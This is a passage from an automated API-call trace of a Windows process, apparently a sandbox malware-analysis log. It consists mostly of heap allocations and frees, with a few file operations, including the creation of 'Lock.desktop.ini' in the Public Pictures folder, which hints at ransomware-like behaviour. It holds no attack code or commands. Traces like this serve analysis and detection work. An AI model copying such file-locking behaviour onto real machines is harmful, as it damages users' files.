lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240ca38 [0267.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.844] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures/" (normalized: "c:\\users\\public\\pictures")) returned 0x11 [0267.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0267.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0267.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3561010 [0267.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.845] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures/Lock.desktop.ini" (normalized: "c:\\users\\public\\pictures\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0267.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0267.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0267.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0267.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0267.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0267.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0267.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0267.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0267.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0267.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0267.865] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0267.865] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x17c, lpOverlapped=0x0) returned 1 [0267.866] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x249c7b0 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0267.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x24b2e00 [0267.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.868] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x249c7b0 [0267.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.868] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0267.869] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.869] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0267.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0267.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0267.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x249c7b0 [0267.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0267.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0267.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x24b2f88 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0267.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0267.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.872] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.872] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0267.873] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0267.873] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0267.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0267.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0267.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0267.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, 